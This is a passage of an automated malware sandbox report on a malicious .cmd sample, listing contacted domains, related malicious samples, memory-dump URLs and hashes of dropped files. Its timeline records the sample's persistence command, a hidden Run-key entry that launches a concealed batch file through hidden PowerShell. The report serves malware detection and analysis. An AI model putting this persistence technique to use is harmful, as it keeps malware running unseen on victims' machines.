      http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3016592946.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475206356.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalseunknown
      http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
      http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://contoso.com/powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.2385169405.000001A6A96E0000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://Passport.NET/tbMicrosoft-Windows-LiveId%4Operational.evtx.49.drfalseunknown
      https://aka.ms/pscore68powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2477927278.000002A7E2571000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000027.00000002.3016592946.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475206356.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalseunknown
      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2477927278.000002A7E2571000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      192.64.119.55
      azure-winsecure.comUnited States
      22612NAMECHEAP-NETUSfalse
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1525388
      Start date and time:2024-10-04 05:22:26 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 11m 39s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:41
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:20
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:1.cmd
      Detection:MAL
      Classification:mal100.spyw.evad.winCMD@55/94@1/1
      EGA Information:
      • Successful, ratio: 91.7%
      HCA Information:
      • Successful, ratio: 99%
      • Number of executed functions: 66
      • Number of non-executed functions: 297
      Cookbook Comments:
      • Found application associated with file extension: .cmd
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 52.168.117.173, 104.208.16.94, 20.42.65.92, 52.182.143.212
      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
      • Execution Graph export aborted for target powershell.exe, PID 7544 because it is empty
      • Not all processes where analyzed, report is missing behavior information
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size exceeded maximum capacity and may have missing disassembly code.
      • Report size getting too big, too many NtFsControlFile calls found.
      • Report size getting too big, too many NtSetInformationFile calls found.
      TimeTypeDescription
      04:24:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
      04:24:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
      23:23:22API Interceptor4x Sleep call for process: WMIC.exe modified
      23:23:25API Interceptor29068x Sleep call for process: powershell.exe modified
      23:23:50API Interceptor2x Sleep call for process: WerFault.exe modified
      23:25:09API Interceptor232x Sleep call for process: winlogon.exe modified
      23:25:10API Interceptor217x Sleep call for process: lsass.exe modified
      23:25:11API Interceptor1656x Sleep call for process: svchost.exe modified
      23:25:12API Interceptor183x Sleep call for process: dwm.exe modified
      23:25:24API Interceptor14x Sleep call for process: cmd.exe modified
      23:25:24API Interceptor12x Sleep call for process: WMIADAP.exe modified
      23:25:24API Interceptor27x Sleep call for process: conhost.exe modified
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      azure-winsecure.com1 (2).cmdGet hashmaliciousUnknownBrowse
      • 154.216.20.132
      rbx-CO2.batGet hashmaliciousUnknownBrowse
      • 154.216.20.132
      SC.cmdGet hashmaliciousUnknownBrowse
      • 154.216.20.132
      1.cmdGet hashmaliciousUnknownBrowse
      • 154.216.20.132
      2.cmdGet hashmaliciousUnknownBrowse
      • 154.216.20.132
      download_2.exeGet hashmaliciousQuasarBrowse
      • 154.216.20.132
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      NAMECHEAP-NETUShttps://livelovelead.coach/wp-admin/readme.htmlGet hashmaliciousPhisherBrowse
      • 162.0.235.3
      hH4dbIGfGT.exeGet hashmaliciousFormBookBrowse
      • 162.0.236.169
      DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
      • 162.0.238.246
      Fvqw64NU4k.exeGet hashmaliciousFormBookBrowse
      • 162.0.236.169
      PO-A1702108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
      • 198.54.122.135
      PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
      • 199.192.21.169
      SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
      • 162.213.249.216
      payment copy.exeGet hashmaliciousFormBookBrowse
      • 162.0.238.238
      ELECTRONIC RECEIPT_Opcsa.htmlGet hashmaliciousEvilProxy, HTMLPhisherBrowse
      • 199.188.203.125
      No context
      No context
      Process:C:\Windows\System32\WerFault.exe
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):1.5088944585074444
      Encrypted:false
      SSDEEP:192:Gmn4mGIy9d0eLDkja1TyDRhl42lg6zuiF7Z24lO8n:5HGIykeLDkjOTkj4Ug6zuiF7Y4lO8n
      MD5:4B129C40B1D4EA03BBBBCEA8093FC7E4
      SHA1:5AFB28CE243D01688349DF2630A2B41E75A7B387
      SHA-256:10E4CB6E2BD88E4585C372CB196B39C09D59EB4D17E123CB31B820ABA7205523
      SHA-512:728B07B39CDF5B26B06980ED53F2DB8E0FAF0EB018D1C08AA8A54B0A1252096E82D64A93711EE6D4F7E15030800E36849082CF3F871D47AD42077E93916B1F1E
      Malicious:false
      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.8.5.8.6.7.6.4.2.6.7.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.8.5.8.6.8.8.6.1.4.1.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.7.0.9.1.b.e.-.d.e.4.5.-.4.6.7.f.-.8.e.8.5.-.c.1.d.0.4.3.a.9.6.f.3.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.f.a.4.6.7.4.-.e.1.6.f.-.4.6.2.6.-.8.8.7.f.-.3.8.e.e.8.1.b.2.1.e.6.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.f.8.-.0.0.0.1.-.0.0.1.4.-.b.6.9.3.-.f.e.e.7.0.c.1.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.
      Process:C:\Windows\System32\WerFault.exe
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):1.5091868889249822
      Encrypted:false
      SSDEEP:192:fVWmG66y9d0eLDkjaVTyJN5Wl4lg6zuiFgZ24lO8n:9ZGHykeLDkj+T+5gqg6zuiFgY4lO8n
      MD5:641990F22296FBB879F00938A9A431A3
      SHA1:955640A65BC6FCF17D49986AF99A20F1C5FBEE50
      SHA-256:1ADFDA8B9D6EA5F21C262BD420D7C720D682BCB6ECD3562E7E2544803D6DB7DD
      SHA-512:F3552EDD79C4D5C38BF3165668F2026E6DE1711DD5AE4DF67A1F00AC51EA38379E66F317C36971970F85C397AFB5326DD5A40DC636FFEFDB0DC69AB8E8980B92
      Malicious:false
      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.8.5.8.1.1.1.1.4.5.1.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.8.5.8.1.2.2.8.6.3.9.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.9.c.c.5.d.6.1.-.6.f.0.a.-.4.9.5.2.-.9.c.4.1.-.c.6.5.3.d.5.0.3.3.0.0.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.3.3.0.c.b.9.-.8.3.9.0.-.4.5.b.3.-.8.5.2.9.-.4.8.7.3.f.f.6.a.4.f.a.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.0.c.-.0.0.0.1.-.0.0.1.4.-.3.6.4.f.-.7.3.c.5.0.c.1.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.
      Process:C:\Windows\System32\WerFault.exe
      File Type:Mini DuMP crash report, 15 streams, Fri Oct 4 03:24:28 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):909890
      Entropy (8bit):3.517845911206375
      Encrypted:false
      SSDEEP:12288:lcqrlDQvevY46TqFhMaNB+BzLeLB3bqb:xQvs6WhMaGMLB3bq
      MD5:CAD70CBC42DCF59BB5437699E4EA6B74
      SHA1:B13B3CDFC964BB16B3793A655164077532B6A930
      SHA-256:D35B8E89DD80138296EFDA4DFA8A683310AE9C8DEF190AF7E9367532682AC97E
      SHA-512:BD6D18CA29CE6BCAA7D45ECA55123B16A0975D6D06E1540DE94E1B9245DFFBFF99A0F8FD9B48C8A7B9FACA6D5744E1D74FA97900B6F1935C2E35F3587A0AF927
      Malicious:false
      Preview:MDMP..a..... ........_.f............$............'..8........;...2......................`.......8...........T............_..2............m...........o..............................................................................eJ......|p......Lw......................T............_.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\System32\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):8584
      Entropy (8bit):3.6944033848594815
      Encrypted:false
      SSDEEP:192:R6l7wVeJ9TX56YUasjjgmfZaPnpWEQx89bkgxfMsm:R6lXJpJ6YCjjgmfQPlkWfO
      MD5:BA70C3BF8E79B17B2252ED6F78723D8D
      SHA1:8767EBB1DC398B37E046080556B6C07EE7755044
      SHA-256:7472AB4AEF2DFF6D5D6A5FAA8C020D13DA889C68A31377612270D8BE39A23388
      SHA-512:A11AEC6F05E7F6C042CFC849CE30E83E46F24C56EDA421911F6FFF1AC2BA824BA1F14AC7AF50EA86E8C55D48B8F8BD7957284CE4262B4EAFE0F3FE1109969CEE
      Malicious:false
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.1.8.4.<./.P.i.
      Process:C:\Windows\System32\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4777
      Entropy (8bit):4.440329921708468
      Encrypted:false
      SSDEEP:48:cvIwWl8zs/Jg771I96FWpW8VY2Ym8M4JQ9wSF/2yq8vlwfytfYd:uIjfhI7V07VGJQG+2WufufYd
      MD5:B06B5B1FF22009D9A2E055D55DDABA07
      SHA1:4827CB178DF146032C57F7ABBCFDE7628FDC48CC
      SHA-256:073FD6124D1D9915ADEE8DF5CA4CD2E05D12AEE98AA70FEDD0DB061AA083D632
      SHA-512:C470DCB32F22A756503164B3ADA1F8000C684E6B1BD5326B8BECAA9AE6F358852D83A2541F2EA4067A7ABFCAE18CBC4C4C194C0D04F8F2F9C06F6C9E4FE6DA6B
      Malicious:false
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="528147" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
      Process:C:\Windows\System32\WerFault.exe
      File Type:Mini DuMP crash report, 15 streams, Fri Oct 4 03:23:31 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):914776
      Entropy (8bit):3.508573124268161
      Encrypted:false
      SSDEEP:6144:2vc/XmiysS+J13QBnqKVoLcY4R0HyNh3/lgpxpBBPGi6u1QI3g0qLap:9mNKZQAKVoPTkh3/lgpnrPGu3nqL+
      MD5:CBD272029E25C46A895643DF3FED30AA
      SHA1:6F3A00EDEF64FF1220FF1B26051BF45E5E982777
      SHA-256:D3AF1ED3EAEE128E78FA5C1F166A2AC61861DEB896D9284A9E5F9F1846A5171F
      SHA-512:A0EB74BB30C3C72D369AF0AC172DF3B3159AD29A25A5CF6A0C6350C4A3A63860ABC43AA35098755CF058FB809A55251E7F68C6B95743098A04FD73741595E4D7
      Malicious:false
      Preview:MDMP..a..... ........_.f............$............'..8....... ;...2......................`.......8...........T............_..H............n...........o..............................................................................eJ.......p......Lw......................T............_.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\System32\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):8780
      Entropy (8bit):3.697894708714123
      Encrypted:false
      SSDEEP:192:R6l7wVeJcZ+66Y3Dn4gmfZaPnpWEz89bo+vfh4m:R6lXJq+66Yzn4gmfQPqoefL
      MD5:968A022836E57DA5230F369012C87D1C
      SHA1:8CE15C8A9AAD470A7AC16A6D82556CA318A6BAE6
      SHA-256:5A30CB1D6E359E4C167DCCF77452D962D0CA10C0DAEEB95CF02E35AC1774CA5E
      SHA-512:FE391772BE6AFD9D70A440BC552618116D097AD470D2DE75A24A954F557E16343836DC37EE0E64B036FF0CC2F957B934D38E95EE88B969EEA68A60F7233C542C
      Malicious:false
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.8.5.2.<./.P.i.
      Process:C:\Windows\System32\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4777
      Entropy (8bit):4.441666974880315
      Encrypted:false
      SSDEEP:48:cvIwWl8zsQJg771I96FWpW8VYFmYm8M4JQ9wSFXWHyq8vlwHytfBd:uIjfWI7V07V8JQG5HWuHufBd
      MD5:73DA5398E8C8CCC2C3E3651897266496
      SHA1:359C8DD638745DB982DEC8C0122AE6208C3A1006
      SHA-256:3774AE9FC907E605D277FD01BC8F8E00CD2F10ADE5ED22E530D041627989EBE4
      SHA-512:35FCAA767D1B8D321C4191391D0EC526FB7F7E00B8FC43B46DD83315B6AA59C1D22D72AC838BCDF81C51804486AE9B35E127DB7FB36731B71CB83B11D7C873C3
      Malicious:false
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="528146" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):9713
      Entropy (8bit):4.940954773740904
      Encrypted:false
      SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
      MD5:BA7C69EBE30EC7DA697D2772E36A746D
      SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
      SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
      SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
      Malicious:false
      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):2916
      Entropy (8bit):5.397135114946659
      Encrypted:false
      SSDEEP:48:4/AzsSU4Yymda+m9qr9tz4RIoUQ/78NfpHARDGx3axIZVE4buNHJBVrHLjtoB:EAzlHYvU9qrfIfl7KfpljPEo2drM
      MD5:0DA6270066A7BFE90CF0C7F108FDA3B5
      SHA1:B1B4653E77B56E94AB4548114D30E8F9C090F892
      SHA-256:0D43921C498F8D4B8CA31B911CE2D310D091BB05EBA6CDD9F53F15BA87D5EAF1
      SHA-512:2F00FB481E7AC1A429FBC9D2BBAEE6249B60288D9DB23A431E44925BCA32B0676A48E23D312899177571CA51FA1877D1CC46FBE008C604E8BD6F615485FF0FD6
      Malicious:false
      Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
